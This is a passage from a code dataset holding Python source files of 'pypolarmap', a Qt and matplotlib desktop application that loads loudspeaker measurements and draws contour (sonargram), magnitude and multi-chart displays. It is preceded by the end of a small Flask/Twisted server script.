request.postpath.insert(0, path)
return self.wsgi
else:
return None
def render(self, request):
return self.wsgi.render(request)
application = service.Application('pyjvcpj')
if cfg.is_access_logging is True:
site = server.Site(FlaskAppWrapper(), logPath=path.join(cfg.config_path, 'access.log').encode())
else:
site = server.Site(FlaskAppWrapper())
endpoint = endpoints.TCP4ServerEndpoint(reactor, cfg.port, interface='0.0.0.0')
endpoint.listen(site)
reactor.run()
else:
# get config from a flask standard place not our config yml
app.run(debug=cfg.run_in_debug, host='0.0.0.0', port=cfg.port, use_reloader=False)
if __name__ == '__main__':
main()
``` |
{
"source": "3ll3d00d/pypolarmap",
"score": 2
} |
#### File: main/python/app.py
```python
import logging
import math
import os
import sys
from contextlib import contextmanager
import matplotlib
from matplotlib.colors import LinearSegmentedColormap
matplotlib.use("Qt5Agg")
from qtpy.QtCore import QSettings
from qtpy.QtGui import QIcon, QFont, QCursor
from qtpy.QtWidgets import QMainWindow, QFileDialog, QDialog, QMessageBox, QApplication, QErrorMessage
from model.contour import ContourModel
from model.display import DisplayModel, DisplayControlDialog
from model.load import NFSLoader
from model.log import RollingLogger
from model.multi import MultiChartModel
from model.preferences import Preferences
from ui.pypolarmap import Ui_MainWindow
from ui.savechart import Ui_saveChartDialog
from model import magnitude as mag, measurement as m
from qtpy import QtCore, QtWidgets
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as Canvas
import colorcet as cc
logger = logging.getLogger('pypolarmap')
# from http://colorcet.pyviz.org/index.html
inverse = {}
for k, v in cc.cm_n.items():
if not k[-2:] == "_r":
inverse[v] = inverse.get(v, [])
inverse[v].insert(0, k)
all_cms = sorted({', '.join(reversed(v)): k for (k, v) in inverse.items()}.items())
cms_by_name = dict(all_cms)
cms_by_name['custom'] = LinearSegmentedColormap.from_list('custom', ['black', 'magenta', 'blue', 'cyan', 'lime', 'yellow', 'red', 'white'])
# Matplotlib canvas class to create figure
class MplCanvas(Canvas):
def __init__(self):
self.figure = Figure(tight_layout=True)
Canvas.__init__(self, self.figure)
Canvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
Canvas.updateGeometry(self)
# Matplotlib widget
class MplWidget(QtWidgets.QWidget):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.canvas = MplCanvas()
self.vbl = QtWidgets.QVBoxLayout()
self.vbl.addWidget(self.canvas)
self.setLayout(self.vbl)
self.__cmap = self.get_colour_map('rainbow')
def get_colour_map(self, name):
return cms_by_name.get(name, cms_by_name.get('bgyw'))
def get_colour(self, idx, count):
'''
:param idx: the colour index.
:return: the colour at that index.
'''
return self.__cmap(idx / count)
class SaveChartDialog(QDialog, Ui_saveChartDialog):
'''
Save Chart dialog
'''
def __init__(self, parent, selectedGraph, statusbar):
super(SaveChartDialog, self).__init__(parent)
self.setupUi(self)
self.chart = selectedGraph
fig = self.chart._chart.canvas.figure
self.__dpi = fig.dpi
self.__x, self.__y = fig.get_size_inches() * fig.dpi
self.__aspectRatio = self.__x / self.__y
self.widthPixels.setValue(self.__x)
self.heightPixels.setValue(self.__y)
self.statusbar = statusbar
self.__dialog = QFileDialog(parent=self)
def accept(self):
formats = "Portable Network Graphic (*.png)"
fileName = self.__dialog.getSaveFileName(self, 'Export Chart', f"{self.chart.name}.png", formats)
if fileName:
outputFile = str(fileName[0]).strip()
if len(outputFile) == 0:
return
else:
scaleFactor = self.widthPixels.value() / self.__x
self.chart._chart.canvas.figure.savefig(outputFile, format='png', dpi=self.__dpi * scaleFactor)
self.statusbar.showMessage(f"Saved {self.chart.name} to {outputFile}", 5000)
QDialog.accept(self)
def updateHeight(self, newWidth):
'''
Updates the height as the width changes according to the aspect ratio.
:param newWidth: the new width.
'''
self.heightPixels.setValue(int(math.floor(newWidth / self.__aspectRatio)))
class PyPolarmap(QMainWindow, Ui_MainWindow):
'''
The main UI.
'''
def __init__(self, app, parent=None):
super(PyPolarmap, self).__init__(parent)
self.app = app
self.preferences = Preferences(QSettings("3ll3d00d", "pypolarmap"))
self.setupUi(self)
self.logViewer = RollingLogger(self, self.preferences)
self.logger = logging.getLogger('pypolarmap')
if getattr(sys, 'frozen', False):
self.__root_path = sys._MEIPASS
else:
self.__root_path = os.path.dirname(__file__)
self.__version = 'UNKNOWN'
try:
with open(os.path.join(self.__root_path, 'VERSION')) as version_file:
self.__version = version_file.read().strip()
except:
logger.exception('Unable to load version')
# menus
self.actionLoad.triggered.connect(self.selectDirectory)
self.actionSave_Current_Image.triggered.connect(self.saveCurrentChart)
self.actionShow_Logs.triggered.connect(self.logViewer.show_logs)
self.actionAbout.triggered.connect(self.showAbout)
self.__display_model = DisplayModel(self.preferences)
self.__measurement_model = m.MeasurementModel(self.__display_model)
self.__display_model.measurement_model = self.__measurement_model
# measured graphs
self.__measured_multi_model = MultiChartModel(self.measuredMultiGraph, self.__measurement_model,
self.__display_model, self.preferences)
self.__measured_polar_model = ContourModel(self.measuredPolarGraph, self.__measurement_model,
self.__display_model, self.preferences)
self.__measured_magnitude_model = mag.MagnitudeModel(self.measuredMagnitudeGraph, self.__measurement_model,
self.__display_model,
selector=self.measuredMagnitudeCurves)
self.__display_model.results_charts = [self.__measured_multi_model, self.__measured_polar_model,
self.__measured_magnitude_model]
self.__measurement_list_model = m.MeasurementListModel(self.__measurement_model, parent=parent)
self.action_Display.triggered.connect(self.show_display_controls_dialog)
def showAbout(self):
''' Shows the about dialog '''
msg_box = QMessageBox()
msg_box.setText(
f"<a href='https://github.com/3ll3d00d/pypolarmap'>pypolarmap</a> v{self.__version} by 3ll3d00d")
msg_box.setIcon(QMessageBox.Information)
msg_box.setWindowTitle('About')
msg_box.exec()
def show_display_controls_dialog(self):
'''
Shows the parameters dialog.
'''
DisplayControlDialog(self, self.__display_model, self.__measurement_model).show()
def setupUi(self, mainWindow):
super().setupUi(self)
geometry = self.preferences.get("geometry")
if not geometry == None:
self.restoreGeometry(geometry)
else:
screenGeometry = self.app.desktop().availableGeometry()
if screenGeometry.height() < 800:
self.showMaximized()
windowState = self.preferences.get("windowState")
if not windowState == None:
self.restoreState(windowState)
def closeEvent(self, *args, **kwargs):
'''
Saves the window state on close.
:param args:
:param kwargs:
'''
self.preferences.set("geometry", self.saveGeometry())
self.preferences.set("windowState", self.saveState())
super().closeEvent(*args, **kwargs)
self.app.closeAllWindows()
# signal handlers
def selectDirectory(self):
'''
Triggered by the select directory button. Shows a file dialog which allows a user to select a directory which is
used to load the set of measurements which is then passed to the various models.
:return:
'''
selected = QFileDialog.getOpenFileName(parent=self, caption='Select NFS File', filter='Filter (*.txt)')
if len(selected) > 0:
self.__measurement_model.load(NFSLoader(selected[0]).load())
self.graphTabs.setEnabled(True)
self.graphTabs.setCurrentIndex(0)
self.graphTabs.setTabEnabled(0, True)
self.enable_analysed_tabs()
self.onGraphTabChange()
else:
self.__measurementModel.clear()
self.graphTabs.setCurrentIndex(0)
self.graphTabs.setEnabled(False)
def saveCurrentChart(self):
'''
Saves the currently selected chart to a file.
'''
selectedGraph = self.getSelectedGraph()
dialog = SaveChartDialog(self, selectedGraph, self.statusbar)
dialog.exec()
def getSelectedGraph(self):
idx = self.graphTabs.currentIndex()
if idx == 0:
return self.__measured_magnitude_model
elif idx == 1:
return self.__measured_polar_model
elif idx == 2:
return self.__measured_multi_model
else:
return None
def onGraphTabChange(self):
'''
Updates the visible chart.
'''
self.__display_model.visible_chart = self.getSelectedGraph()
def disable_analysed_tabs(self):
''' Disables all tabs that depend on the impulse analysis '''
for idx in range(0, self.graphTabs.count()):
self.graphTabs.setTabEnabled(idx, False)
def enable_analysed_tabs(self):
''' Enables all tabs that depend on the impulse analysis '''
for idx in range(0, self.graphTabs.count()):
self.graphTabs.setTabEnabled(idx, True)
e_dialog = None
def main():
app = QApplication(sys.argv)
if getattr(sys, 'frozen', False):
iconPath = os.path.join(sys._MEIPASS, 'Icon.ico')
else:
iconPath = os.path.abspath(os.path.join(os.path.dirname('__file__'), '../icons/Icon.ico'))
if os.path.exists(iconPath):
app.setWindowIcon(QIcon(iconPath))
form = PyPolarmap(app)
# setup the error handler
global e_dialog
e_dialog = QErrorMessage(form)
e_dialog.setWindowModality(QtCore.Qt.WindowModal)
font = QFont()
font.setFamily("Consolas")
font.setPointSize(8)
e_dialog.setFont(font)
form.show()
app.exec_()
# display exceptions in a QErrorMessage so the user knows what just happened
sys._excepthook = sys.excepthook
def dump_exception_to_log(exctype, value, tb):
import traceback
if e_dialog is not None:
formatted = traceback.format_exception(etype=exctype, value=value, tb=tb)
msg = '<br>'.join(formatted)
e_dialog.setWindowTitle('Unexpected Error')
e_dialog.showMessage(msg)
e_dialog.resize(1200, 400)
else:
print(exctype, value, tb)
sys.excepthook = dump_exception_to_log
if __name__ == '__main__':
main()
@contextmanager
def wait_cursor(msg=None):
'''
Allows long running functions to show a busy cursor.
:param msg: a message to put in the status bar.
'''
try:
QApplication.setOverrideCursor(QCursor(QtCore.Qt.WaitCursor))
yield
finally:
QApplication.restoreOverrideCursor()
```
#### File: python/model/contour.py
```python
import logging
import numpy as np
from matplotlib import animation
from model import configureFreqAxisFormatting, calculate_dBFS_Scales, colorbar, SINGLE_SUBPLOT_SPEC
from model.measurement import CLEAR_MEASUREMENTS, LOAD_MEASUREMENTS
from model.preferences import DISPLAY_COLOUR_MAP
logger = logging.getLogger('contour')
class ContourModel:
'''
Allows a set of FRs to be displayed as a directivity sonargram.
'''
def __init__(self, chart, measurement_model, display_model, preferences,
subplot_spec=SINGLE_SUBPLOT_SPEC, redraw_on_display=True, depends_on=lambda: False,
show_crosshairs=False):
'''
Creates a new contour model.
:param chart: the MplWidget that owns the canvas onto which the chart will be drawn.
:param measurement_model: the underlying measurements.
:param subplot_spec: the spec for the subplot, defaults to a single plot.
:param cbSubplotSpec: the spec for the colorbar, defaults to put it anywhere you like.
'''
self.__chart = chart
self.__axes = None
self.__crosshair_axes = None
self.__show_crosshairs = show_crosshairs
self.__subplot_spec = subplot_spec
self.__init_chart(subplot_spec)
self.__measurement_model = measurement_model
self.__depends_on = depends_on
self.__selected_cmap = preferences.get(DISPLAY_COLOUR_MAP)
self.__cmap_changed = False
self.name = 'contour'
self.__data = None
self.__tc = None
self.__tcf = None
self.__cid = []
self.__refresh_data = False
self.__measurement_model.register_listener(self)
self.__record_y = False
self.__dragging = False
self.cursor_x = None
self.cursor_y = None
self.__crosshair_h = None
self.__crosshair_v = None
self.__ani = None
self.__redraw_on_display = redraw_on_display
self.__display_model = display_model
self.__required_clim = None
self.__extents = []
def __repr__(self):
return self.name
def should_refresh(self):
return self.__refresh_data or self.__depends_on
def __init_chart(self, subplotSpec):
'''
Initialises the chart with the default configuration.
:param subplotSpec: the spec for the subplot.
'''
if self.__axes is None:
self.__axes = self.__chart.canvas.figure.add_subplot(subplotSpec)
if self.__show_crosshairs is True and self.__crosshair_axes is None:
self.__crosshair_axes = self.__axes.twinx()
self.__crosshair_axes.get_yaxis().set_visible(False)
self.__axes.axis('auto')
self.__axes.set_xscale('log')
self.__axes.set_xlabel('Hz')
self.__axes.set_ylabel('Degrees')
self.__axes.grid(linestyle='-', which='major', linewidth=1, alpha=0.5)
self.__axes.grid(linestyle='--', which='minor', linewidth=1, alpha=0.5)
def update_decibel_range(self, draw=True):
'''
Updates the decibel range on the chart.
'''
# record the target clim in case we don't want to draw right now
if self.__tcf is not None:
_, cmax = self.__tcf.get_clim()
self.__required_clim = (cmax - self.__display_model.db_range, cmax)
self.__tcf.set_clim(vmin=self.__required_clim[0], vmax=self.__required_clim[1])
if draw:
self.__required_clim = None
self.__chart.canvas.draw_idle()
def on_update(self, type, **kwargs):
'''
Handles events from the measurement model.
:param type: the type.
:param kwargs: any additional args.
:return:
'''
if type == LOAD_MEASUREMENTS:
self.__refresh_data = True
elif type == CLEAR_MEASUREMENTS:
self.clear()
def display(self):
'''
Updates the contents of the chart. This occurs if we need to recalculate the plot data (i.e. if the underlying
data has changed) or if we are redisplaying this chart and the y range has changed since it was last visible.
:return: true if it redrew.
'''
if len(self.__measurement_model) > 0:
if self.__refresh_data:
self.__data = self.__measurement_model.get_contour_data()
self.__extents = [np.nanmin(self.__data['x']), np.nanmax(self.__data['x']),
np.nanmax(self.__data['y']), np.nanmin(self.__data['y'])]
if self.__tcf:
self.clear(disconnect=False)
self.__redraw()
self.connect_mouse()
if self.__redraw_on_display:
self.__chart.canvas.draw_idle()
self.__refresh_data = False
return True
else:
# this is called when the owning tab is selected so we need to update the clim if the y range
# was changed while this chart was off screen
if self.__tcf is not None and self.__required_clim is not None:
self.update_decibel_range(draw=self.__redraw_on_display)
return self.__redraw_on_display
if self.__cmap_changed:
self.__chart.canvas.draw_idle()
self.__cmap_changed = False
return False
def __redraw(self):
'''
draws the contours and the colorbar.
:return:
'''
vmax, vmin, steps, fill_steps = calculate_dBFS_Scales(self.__data['z'],
max_range=self.__display_model.db_range,
vmax_to_round=False)
actual_vmax = np.math.ceil(np.nanmax(self.__data['z']))
line_offset = actual_vmax - vmax
line_steps = steps + line_offset
self.__tc = self.__axes.tricontour(self.__data['x'], self.__data['y'], self.__data['z'],
line_steps if not self.__display_model.normalised else line_steps - np.max(line_steps) - 2,
linewidths=0.5, colors='k', linestyles='--')
self.__tc = self.__axes.tricontour(self.__data['x'], self.__data['y'], self.__data['z'],
levels=[actual_vmax - 6] if not self.__display_model.normalised else [-6],
linewidths=1.5, colors='k')
self.__tcf = self.__axes.tricontourf(self.__data['x'], self.__data['y'], self.__data['z'], fill_steps,
vmin=vmin, vmax=vmax,
cmap=self.__chart.get_colour_map(self.__selected_cmap))
self._cb = colorbar(self.__tcf)
self._cb.set_ticks(steps)
configureFreqAxisFormatting(self.__axes)
self.__tcf.set_clim(vmin=vmin, vmax=vmax)
if self.__crosshair_axes is not None:
xlim = self.__axes.get_xlim()
ylim = self.__axes.get_ylim()
self.__crosshair_axes.set_xlim(left=xlim[0], right=xlim[1])
self.__crosshair_axes.set_ylim(bottom=ylim[0], top=ylim[1])
self.__crosshair_h = self.__crosshair_axes.axhline(color='k', linestyle=':')
self.__crosshair_v = self.__crosshair_axes.axvline(color='k', linestyle=':')
if self.__ani is None:
logger.info(f"Starting animation in {self.name}")
self.__ani = animation.FuncAnimation(self.__chart.canvas.figure, self.__redraw_crosshairs, interval=50,
init_func=self.__init_crosshairs, blit=True, save_count=50, repeat=False)
def __init_crosshairs(self):
self.__crosshair_h.set_ydata([self.__extents[3], self.__extents[3]])
self.__crosshair_v.set_xdata([self.__extents[0], self.__extents[0]])
return self.__crosshair_h, self.__crosshair_v
def __redraw_crosshairs(self, frame, *fargs):
if self.cursor_y is not None:
self.__crosshair_h.set_ydata([self.cursor_y] * 2)
if self.cursor_x is not None:
self.__crosshair_v.set_xdata([self.cursor_x] * 2)
return self.__crosshair_h, self.__crosshair_v
def recordDataCoords(self, event):
'''
Records the current location of the mouse
:param event: the event.
'''
if event is not None and self.__record_y and self.__dragging:
self.cursor_x = event.xdata
self.cursor_y = event.ydata
def enterAxes(self, event):
'''
Start recording the y position if the mouse is in the contour plot.
:param event: the location event.
'''
self.__record_y = event.inaxes is self.__axes or self.__crosshair_axes
def leaveAxes(self, event):
'''
Stop recording the y position if the mouse leaves the contour plot.
:param event: the location event.
'''
if event.inaxes is self.__axes:
self.__record_y = False
def connect_mouse(self):
'''
Ensure that the y position is recorded when the mouse moves around the contour map.
:return:
'''
if self.__cid is None or len(self.__cid) == 0:
self.__cid.append(self.__chart.canvas.mpl_connect('motion_notify_event', self.recordDataCoords))
self.__cid.append(self.__chart.canvas.mpl_connect('button_press_event', self.depress))
self.__cid.append(self.__chart.canvas.mpl_connect('button_release_event', self.release))
self.__cid.append(self.__chart.canvas.mpl_connect('axes_enter_event', self.enterAxes))
self.__cid.append(self.__chart.canvas.mpl_connect('axes_leave_event', self.leaveAxes))
def depress(self, event):
if not event.dblclick:
self.__dragging = True
def release(self, event):
self.__dragging = False
def update_colour_map(self, cmap_name, draw=True):
'''
Updates the currently selected colour map.
:param cmap_name: the cmap name.
'''
if cmap_name != self.__selected_cmap:
self.__selected_cmap = cmap_name
if self.__tcf:
cmap = self.__chart.get_colour_map(cmap_name)
self.__tcf.set_cmap(cmap)
if draw:
self.__chart.canvas.draw_idle()
else:
self.__cmap_changed = True
def clear(self, disconnect=True, draw=True):
'''
clears the graph and disconnects the handlers
'''
if self.__tcf:
if disconnect:
for cid in self.__cid:
self.__chart.canvas.mpl_disconnect(cid)
self.__cid = []
self.stop_animation()
self._cb.remove()
self.__axes.clear()
if self.__crosshair_axes is not None:
self.__crosshair_axes.clear()
self.__tc = None
self.__tcf = None
self.__init_chart(self.__subplot_spec)
self.__refresh_data = True
if draw:
self.__chart.canvas.draw_idle()
def stop_animation(self):
'''
Stops the animation.
'''
if self.__ani is not None:
logger.info(f"Stopping animation in {self.name}")
ani = self.__ani
self.__ani = None
ani._stop()
```
#### File: python/model/display.py
```python
from PyQt5.QtWidgets import QDialog, QDialogButtonBox
from model.preferences import DISPLAY_DB_RANGE, DISPLAY_COLOUR_MAP, DISPLAY_POLAR_360
from ui.display import Ui_displayControlsDialog
class DisplayModel:
'''
Parameters to feed into how a chart should be displayed.
'''
def __init__(self, preferences):
self.__preferences = preferences
self.__db_range = self.__preferences.get(DISPLAY_DB_RANGE)
self.__normalised = False
self.__normalisation_angle = 0
self.__visible_chart = None
self.__colour_map = self.__preferences.get(DISPLAY_COLOUR_MAP)
self.__locked = False
self.__full_polar_range = self.__preferences.get(DISPLAY_POLAR_360)
self.results_charts = []
self.measurement_model = None
def __repr__(self):
return self.__class__.__name__
@property
def colour_map(self):
return self.__colour_map
def accept(self, colour_map, db_range, is_normalised, normalisation_angle, full_polar_range):
self.lock()
should_refresh = False
norm_change = False
if self.__colour_map != colour_map:
self.__colour_map = colour_map
for chart in self.results_charts:
if hasattr(chart, 'update_colour_map'):
chart.update_colour_map(self.__colour_map, draw=False)
self.__preferences.set(DISPLAY_COLOUR_MAP, colour_map)
should_refresh = True
if self.__db_range != db_range:
self.__db_range = db_range
for chart in self.results_charts:
chart.update_decibel_range(draw=False)
self.__preferences.set(DISPLAY_DB_RANGE, db_range)
should_refresh = True
if self.__normalised != is_normalised:
self.__normalised = is_normalised
should_refresh = True
norm_change = True
if full_polar_range != self.__full_polar_range:
self.__full_polar_range = full_polar_range
should_refresh = True
if normalisation_angle != self.__normalisation_angle:
self.__normalisation_angle = normalisation_angle
if self.__normalised:
norm_change = True
should_refresh = True
if norm_change:
self.measurement_model.normalisation_changed()
self.unlock(should_refresh)
@property
def db_range(self):
return self.__db_range
@property
def normalised(self):
return self.__normalised
@property
def normalisation_angle(self):
return self.__normalisation_angle
@property
def full_polar_range(self):
return self.__full_polar_range
@property
def visible_chart(self):
return self.__visible_chart
@visible_chart.setter
def visible_chart(self, visible_chart):
if self.__visible_chart is not None and getattr(self.__visible_chart, 'hide', None) is not None:
self.__visible_chart.hide()
self.__visible_chart = visible_chart
self.redraw_visible()
def redraw_visible(self):
if self.__visible_chart is not None and self.__locked is not True:
display = getattr(self.__visible_chart, 'display', None)
if display is not None and callable(display):
display()
def lock(self):
''' flags the model as locked so changes do not result in a redraw '''
self.__locked = True
def unlock(self, should_redraw):
''' flags the model as unlocked and redraws '''
self.__locked = False
if should_redraw:
self.redraw_visible()
class DisplayControlDialog(QDialog, Ui_displayControlsDialog):
'''
Display Parameters dialog
'''
def __init__(self, parent, display_model, measurement_model):
super(DisplayControlDialog, self).__init__(parent)
self.setupUi(self)
self.__display_model = display_model
self.__measurement_model = measurement_model
self.yAxisRange.setValue(self.__display_model.db_range)
self.normaliseCheckBox.setChecked(self.__display_model.normalised)
for m in self.__measurement_model:
self.normalisationAngle.addItem(str(m.h))
self.__select_combo(self.normalisationAngle, str(self.__display_model.normalisation_angle))
stored_idx = 0
from app import cms_by_name
for idx, (name, cm) in enumerate(cms_by_name.items()):
self.colourMapSelector.addItem(name)
if name == self.__display_model.colour_map:
stored_idx = idx
self.colourMapSelector.setCurrentIndex(stored_idx)
self.buttonBox.button(QDialogButtonBox.Apply).clicked.connect(self.apply)
@staticmethod
def __select_combo(combo, value):
if value is not None:
idx = combo.findText(value)
if idx != -1:
combo.setCurrentIndex(idx)
return idx
return None
def apply(self):
''' Updates the parameters and reanalyses the model. '''
from app import wait_cursor
with wait_cursor():
self.__display_model.accept(self.colourMapSelector.currentText(),
self.yAxisRange.value(),
self.normaliseCheckBox.isChecked(),
self.normalisationAngle.currentText(),
self.polarRange.isChecked())
```
#### File: python/model/magnitude.py
```python
import logging
import numpy as np
from matplotlib import animation
from qtpy import QtCore
from qtpy.QtWidgets import QListWidgetItem
from model import configureFreqAxisFormatting, format_axes_dbfs_hz, set_y_limits, SINGLE_SUBPLOT_SPEC, \
calculate_dBFS_Scales
from model.measurement import CLEAR_MEASUREMENTS, LOAD_MEASUREMENTS
logger = logging.getLogger('magnitude')
class MagnitudeModel:
'''
Allows a set of measurements to be displayed on a chart as magnitude responses.
'''
def __init__(self, chart, measurement_model, display_model, model_listener=None,
subplot_spec=SINGLE_SUBPLOT_SPEC, show_legend=True, selector=None, depends_on=lambda: False):
self.__chart = chart
self.__axes = self.__chart.canvas.figure.add_subplot(subplot_spec)
format_axes_dbfs_hz(self.__axes)
self.__curves = {}
self.__refresh_data = False
self.name = f"magnitude"
self.__measurement_model = measurement_model
self.__model_listener = model_listener
self.__show_legend = show_legend
self.__measurement_model.register_listener(self)
self.__display_model = display_model
self.__selector = selector
self.__depends_on = depends_on
if self.__selector is not None:
self.__selector.itemSelectionChanged.connect(self.set_visible)
self.update_decibel_range(draw=False)
def set_visible(self):
''' ensures the visible curves tracks the contents of the selector '''
selected = [x.text() for x in self.__selector.selectedItems()]
for name, curve in self.__curves.items():
curve.set_visible(name in selected)
self.__chart.canvas.draw_idle()
def __repr__(self):
return self.name
def should_refresh(self):
return self.__refresh_data or self.__depends_on()
def update_decibel_range(self, draw=True):
'''
Updates the decibel range on the chart.
'''
if draw:
set_y_limits(self.__axes, self.__display_model.db_range)
self.__chart.canvas.draw_idle()
def display(self):
'''
Updates the contents of the magnitude chart
'''
# TODO might need to update the ylim even if we haven't refreshed
if self.should_refresh():
# pressure
data = self.__measurement_model.get_magnitude_data()
current_names = [x.display_name for x in data]
all_y = [x.y for x in data]
for idx, x in enumerate(data):
self._create_or_update_curve(x, self.__axes, self.__chart.get_colour(idx, len(self.__measurement_model)))
# power
power = self.__measurement_model.power_response
if power is not None:
self._create_or_update_curve(power, self.__axes, 'k')
all_y.append(power.y)
current_names.append(power.display_name)
# di
di = self.__measurement_model.di
if di is not None:
self._create_or_update_curve(di, self.__axes, 'k')
all_y.append(di.y)
current_names.append(di.display_name)
# scales
self._update_y_lim(np.concatenate(all_y), self.__axes)
# delete redundant data
to_delete = [k for k in self.__curves.keys() if k not in current_names]
for d in to_delete:
self.__curves[d].remove()
del self.__curves[d]
for item in self.__selector.findItems(d, QtCore.Qt.MatchExactly):
self.__selector.takeItem(self.__selector.row(item))
# legend
if self.__show_legend:
lines = self.__curves.values()
if self.__axes.get_legend() is not None:
self.__axes.get_legend().remove()
self.__axes.legend(lines, [l.get_label() for l in lines], loc=8, ncol=4, fancybox=True, shadow=True)
# selector
if self.__selector is not None:
self.__selector.selectAll()
else:
self.__chart.canvas.draw_idle()
self.__refresh_data = False
else:
ylim = self.__axes.get_ylim()
if ylim[1] - ylim[0] != self.__display_model.db_range:
self.update_decibel_range()
def _update_y_lim(self, data, axes):
configureFreqAxisFormatting(axes)
ymax, ymin, _, _ = calculate_dBFS_Scales(data, max_range=self.__display_model.db_range)
axes.set_ylim(bottom=ymin, top=ymax)
def _create_or_update_curve(self, data, axes, colour):
curve = self.__curves.get(data.display_name, None)
if curve:
curve.set_data(data.x, data.y)
else:
self.__curves[data.display_name] = axes.semilogx(data.x, data.y,
linewidth=2,
antialiased=True,
linestyle='solid',
color=colour,
label=data.display_name)[0]
if self.__selector is not None:
self.__selector.addItem(QListWidgetItem(data.display_name, self.__selector))
def on_update(self, event_type, **kwargs):
'''
handles measurement model changes
If event type is activation toggle then changes the associated curve visibility.
If event type is analysis change then the model is marked for refresh.
:param event_type: the event.
:param idx: the measurement idx.
'''
if self.__model_listener:
self.__model_listener.on_update(event_type, kwargs)
if event_type == LOAD_MEASUREMENTS:
self.__refresh_data = True
elif event_type == CLEAR_MEASUREMENTS:
self.clear()
def clear(self):
'''
clears the graph.
'''
self.__axes.clear()
self.__curves = {}
format_axes_dbfs_hz(self.__axes)
if self.__selector is not None:
self.__selector.clear()
class AnimatedSingleLineMagnitudeModel:
'''
Allows a single measurement from a selection of magnitude data to be displayed on a chart.
'''
def __init__(self, chart, measurement_model, display_model, marker_data,
subplot_spec=SINGLE_SUBPLOT_SPEC, redraw_on_display=True):
self._chart = chart
self.__measurement_model = measurement_model
self.__measurement_model.register_listener(self)
self.__axes = self._chart.canvas.figure.add_subplot(subplot_spec)
self.__secondary_axes = self.__axes.twinx()
self.__secondary_axes.set_ylim(bottom=0, top=30)
format_axes_dbfs_hz(self.__axes)
self.name = f"single-magnitude"
self.__refresh_data = False
self.x_position = None
self.y_position = None
self.__pressure_data = None
self.__pressure_curve = None
self.__pressure_marker = None
self.__power_data = None
self.__power_curve = None
self.__power_marker = None
self.__di_data = None
self.__di_curve = None
self.__di_marker = None
self.__vline = None
self.__ani = None
self.__y_range_update_required = False
self.__redraw_on_display = redraw_on_display
self.__display_model = display_model
self.__marker_data = marker_data
def __repr__(self):
return self.name
def should_refresh(self):
return self.__refresh_data
def update_decibel_range(self, draw=True):
'''
Updates the decibel range on the chart.
'''
self.__y_range_update_required = True
set_y_limits(self.__axes, self.__display_model.db_range)
if self.__ani:
# have to clear the blit cache to get the r grid to redraw as per
# https://stackoverflow.com/questions/25021311/matplotlib-animation-updating-radial-view-limit-for-polar-plot
self.__ani._blit_cache.clear()
if draw:
self._chart.canvas.draw_idle()
self.__y_range_update_required = False
def display(self):
'''
Gets fresh data and redraws.
:return: true if it redrew.
'''
redrew = False
if self.should_refresh():
if self.__pressure_curve is None:
# pressure
self.__pressure_data = self.__measurement_model.get_magnitude_data()
self.__pressure_curve = self.__axes.semilogx(self.__pressure_data[0].x,
[np.nan] * len(self.__pressure_data[0].x),
linewidth=2,
antialiased=True,
linestyle='solid')[0]
self.__pressure_marker = self.__axes.plot(0, 0, 'bo', markersize=8)[0]
all_data = [x.y for x in self.__pressure_data]
# directivity
if self.__di_data:
self.__di_curve = self.__secondary_axes.semilogx(self.__di_data[0].x,
[np.nan] * len(self.__pressure_data[0].x),
linewidth=2,
antialiased=True,
linestyle='--')[0]
self.__di_marker = self.__secondary_axes.plot(0, 0, 'bo', markersize=8)[0]
if self.__power_data:
# power
self.__power_curve = self.__axes.semilogx(self.__power_data.x,
self.__power_data.y,
linewidth=2,
antialiased=True,
color='k',
linestyle='solid')[0]
self.__power_marker = self.__axes.plot(0, 0, 'ko', markersize=8)[0]
all_data.append(self.__power_data.y)
# line
self.__vline = self.__axes.axvline(x=0, linewidth=2, color='gray', linestyle=':')
# scales
ymax, ymin, _, _ = calculate_dBFS_Scales(np.concatenate(all_data),
max_range=self.__display_model.db_range)
self.__axes.set_ylim(bottom=ymin, top=ymax, auto=False)
configureFreqAxisFormatting(self.__axes)
self.__y_range_update_required = False
self.__refresh_data = False
redrew = True
else:
if self.__pressure_curve is not None:
if self.__y_range_update_required:
self.update_decibel_range(self.__redraw_on_display)
# make sure we are animating
if self.__ani is None and self.__pressure_data is not None:
logger.info(f"Starting animation in {self.name}")
self.__ani = animation.FuncAnimation(self._chart.canvas.figure, self.redraw, interval=50,
init_func=self.initAnimation, blit=True, save_count=50, repeat=False)
return redrew
def initAnimation(self):
'''
Inits a blank screen.
:return: the curve artist.
'''
self.__pressure_curve.set_ydata([np.nan] * len(self.__pressure_data[0].x))
vals = [self.__pressure_curve, self.__pressure_marker]
if self.__power_data:
vals.append(self.__power_curve)
vals.append(self.__power_marker)
if self.__di_data:
vals.append(self.__di_curve)
vals.append(self.__di_data)
vals.append(self.__vline)
return vals
def __find_nearest_xy(self, curve):
return np.argmax(curve.x >= self.x_position)
def redraw(self, frame, *fargs):
'''
Redraws the graph based on the yPosition.
'''
curve_data, curve_idx = self.find_nearest_xy_data()
if curve_idx != -1:
colour = self._chart.get_colour(curve_idx, len(self.__measurement_model))
self.__pressure_curve.set_ydata(curve_data.y)
self.__pressure_curve.set_color(colour)
idx = self.__find_nearest_xy(curve_data)
self.__pressure_marker.set_data(curve_data.x[idx], curve_data.y[idx])
self.__marker_data.freq = curve_data.x[idx]
self.__marker_data.spl = curve_data.y[idx]
self.__pressure_marker.set_color(colour)
self.__vline.set_xdata([curve_data.x[idx], curve_data.x[idx]])
if self.__power_data:
di_y = (curve_data.y * curve_data.y) / self.__power_data.y
di_y += (0.0 - di_y[0])
self.__di_curve.set_ydata(di_y)
self.__di_curve.set_color(colour)
self.__di_marker.set_color(colour)
self.__di_marker.set_data(curve_data.x[idx], di_y[idx])
self.__power_marker.set_data(curve_data.x[idx], self.__power_data.y[idx])
self.__marker_data.di = di_y[idx]
self.__marker_data.power = self.__power_data.y[idx]
if self.__power_data:
return self.__pressure_curve, self.__pressure_marker, self.__power_curve, self.__power_marker, self.__di_curve, self.__di_marker, self.__vline
else:
return self.__pressure_curve, self.__pressure_marker, self.__vline
def find_nearest_xy_data(self):
'''
Searches the available data to find the curve that is the closest hAngle to our current yPosition.
:return: (curve_idx, curve_data) or (-1, None) if nothing is found.
'''
curve_idx = -1
curve_data = None
delta = 100000000
if self.y_position is not None:
for idx, x in enumerate(self.__pressure_data):
new_delta = abs(self.y_position - x.h)
if new_delta < delta:
delta = new_delta
